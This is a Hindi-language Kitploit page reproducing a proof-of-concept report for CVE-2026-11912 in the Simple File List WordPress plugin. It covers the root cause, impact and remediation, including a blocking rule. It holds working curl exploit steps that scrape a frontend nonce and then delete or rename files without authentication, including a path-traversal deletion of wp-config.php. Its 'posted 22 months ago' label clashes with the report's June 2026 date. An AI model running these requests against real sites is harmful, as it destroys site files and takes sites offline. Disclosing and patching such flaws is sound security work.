Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/polosss/by-poloss..-..cve-2026-11912
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubpolosss/by-poloss..-..cve-2026-11912

By-Poloss..-..CVE-2026-11912

अनधिकृत पहुँच से प्रमाणीकरण रहित फ़ाइल संशोधन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-11912: Simple File List <= 6.3.7 - अनधिकृत पहुँच की कमी से अप्रमाणित फ़ाइल संशोधन

कार्यकारी सारांश

क्षेत्रमान
CVE पहचानCVE-2026-11912
CVSS स्कोर7.5 (उच्च)
CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
प्रभावित प्लगिनSimple File List
प्रभावित संस्करण<= 6.3.7
पैच किया गया संस्करण6.3.8
प्रकाशितजून 19, 2026
शोधकर्ताChloe Chamberland - Wordfence
प्रयोगशाला वातावरणpoloss-lab.ddev.site (DDEV)

कमज़ोरी विवरण

विवरण

WordPress के लिए Simple File List प्लगिन, संस्करण 6.3.7 तक के सभी संस्करणों में अपर्याप्त प्राधिकरण जाँच के कारण मनमानी फ़ाइल संशोधन की अनुमति देता है। इससे अप्रमाणित हमलावरों के लिए सर्वर पर फ़ाइलों को हटाना और संशोधित करना संभव हो जाता है।

मूल कारण विश्लेषण

यह कमज़ोरी निम्न कारणों से मौजूद है:

  1. AJAX एंडपॉइंट पंजीकरण: simplefilelist_edit_job AJAX क्रिया wp_ajax_ और wp_ajax_nopriv_ दोनों हुक्स के साथ पंजीकृत है, जो अप्रमाणित पहुँच की अनुमति देता है:

    root@kitploit:~
    add_action('wp_ajax_simplefilelist_edit_job', 'simplefilelist_edit_job');
    add_action('wp_ajax_nopriv_simplefilelist_edit_job', 'simplefilelist_edit_job');
    
  2. दोषपूर्ण प्राधिकरण जाँच: eeSFL_FileEditor() (पंक्ति 1265) में प्राधिकरण तर्क का उपयोग:

    root@kitploit:~
    if(!is_admin() AND $eeSFL->eeListSettings['AllowFrontManage'] != 'YES') {
        return;
    }
    

    is_admin() फ़ंक्शन AJAX अनुरोधों के लिए FALSE लौटाता है, जिस कारण AllowFrontManage सेटिंग का मूल्यांकन होने से पहले ही प्राधिकरण जाँच शॉर्ट-सर्किट हो जाती है।

  3. नॉन्स एक्सपोज़र: सुरक्षा नॉन्स (eeSFL_ActionNonce) wp_create_nonce() का उपयोग करके उत्पन्न होता है और फ्रंटएंड HTML स्रोत कोड में उजागर होता है, जिससे हमलावर इसे प्रमाणीकरण के बिना निकाल सकते हैं।

प्रभाव मूल्यांकन

गोपनीयता प्रभाव: उच्च

  • फ़ाइल सूचीकरण के माध्यम से फ़ाइल सामग्री पढ़ी जा सकती है
  • फ़ाइल मेटाडेटा उजागर (नाम, आकार, तिथियाँ)

अखंडता प्रभाव: उच्च (महत्वपूर्ण)

  • अप्रमाणित फ़ाइल विलोपन
  • अप्रमाणित फ़ाइल नाम परिवर्तन
  • अप्रमाणित फ़ाइल विवरण संशोधन
  • पथ ट्रैवर्सल महत्वपूर्ण फ़ाइलों (wp-config.php सहित) के विलोपन की अनुमति देता है

उपलब्धता प्रभाव: कोई नहीं

  • फ़ाइल संचालन सीधे DoS का कारण नहीं बनते, लेकिन फ़ाइल विलोपन के माध्यम से उपलब्धता को अप्रत्यक्ष रूप से प्रभावित कर सकते हैं

वास्तविक दुनिया में शोषण प्रदर्शित

परीक्षण के दौरान, इस कमज़ोरी का सफलतापूर्वक WordPress कॉन्फ़िगरेशन फ़ाइल (wp-config.php) को हटाने के लिए शोषण किया गया, जिससे साइट पूरी तरह से टूट गई। यह इस कमज़ोरी के पथ ट्रैवर्सल पहलू की गंभीरता को दर्शाता है।

PoC शोषण चरण

चरण 1: फ्रंटएंड से नॉन्स निकालें

root@kitploit:~
# सुरक्षा नॉन्स को फ़ाइल सूची पृष्ठ से प्राप्त करें
curl -k -sL "https://poloss-lab.ddev.site/file-list/" | grep -o 'eeSFL_ActionNonce">[^<]*'
# आउटपुट: eeSFL_ActionNonce">1c14af78c2

चरण 2: अप्रमाणित फ़ाइल हटाएँ

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Delete" \
  -d "eeFileName=test.txt"
# प्रतिक्रिया: SUCCESS

चरण 3: अप्रमाणित फ़ाइल का नाम बदलें

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Edit" \
  -d "eeFileName=original.pdf" \
  -d "eeFileNameNew=malicious.pdf"
# प्रतिक्रिया: SUCCESS

चरण 4: पथ ट्रैवर्सल (महत्वपूर्ण - wp-config.php हटाएँ)

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Delete" \
  -d "eeFileName=../../wp-config.php"
# प्रतिक्रिया: SUCCESS (महत्वपूर्ण - यह साइट को तोड़ देता है!)

उपचार

तत्काल कार्रवाई

  1. प्लगिन अपडेट करें: Simple File List संस्करण 6.3.8 या उच्चतर पर अपग्रेड करें
  2. समझौते की जाँच करें: अनधिकृत संशोधनों के लिए फ़ाइल सिस्टम का ऑडिट करें
  3. बैकअप पुनर्स्थापित करें: यदि wp-config.php प्रभावित हुआ है, तो बैकअप से पुनर्स्थापित करें

अस्थायी शमन उपाय (यदि तत्काल अपडेट संभव न हो)

  1. पैच लागू होने तक Simple File List प्लगिन को अक्षम करें
  2. [eeSFL] शॉर्टकोड वाले किसी भी पृष्ठ को हटाएँ
  3. संदिग्ध AJAX अनुरोधों को अवरुद्ध करने के लिए WAF नियम लागू करें:
    root@kitploit:~
    # simplefilelist_edit_job AJAX कॉल को ब्लॉक करें
    <IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{QUERY_STRING} action=simplefilelist_edit_job
        RewriteRule ^wp-admin/admin-ajax\.php$ - [F,L]
    </IfModule>
    

दीर्घकालिक सिफारिशें

  • अनुरोध उत्पत्ति सत्यापन (CSRF सुरक्षा) लागू करें
  • सभी फ़ाइल संचालनों के लिए क्षमता जाँच जोड़ें
  • AJAX एंडपॉइंट की दर सीमित करें
  • संदिग्ध फ़ाइल संचालनों के लिए लॉग की निगरानी करें

संदर्भ

  • Wordfence Intelligence
  • Simple File List Plugin Page
  • Plugin SVN Trunk

परीक्षण वातावरण

  • प्रयोगशाला: DDEV poloss-lab
  • यूआरएल: https://poloss-lab.ddev.site
  • परीक्षित प्लगिन संस्करण: 6.3.7
  • वर्डप्रेस संस्करण: नवीनतम (PHP 8.4)

रिपोर्ट Claude Code - WordPress Security Testing Lab द्वारा उत्पन्न दिनांक: जून 20, 2026

टूल डाउनलोड करें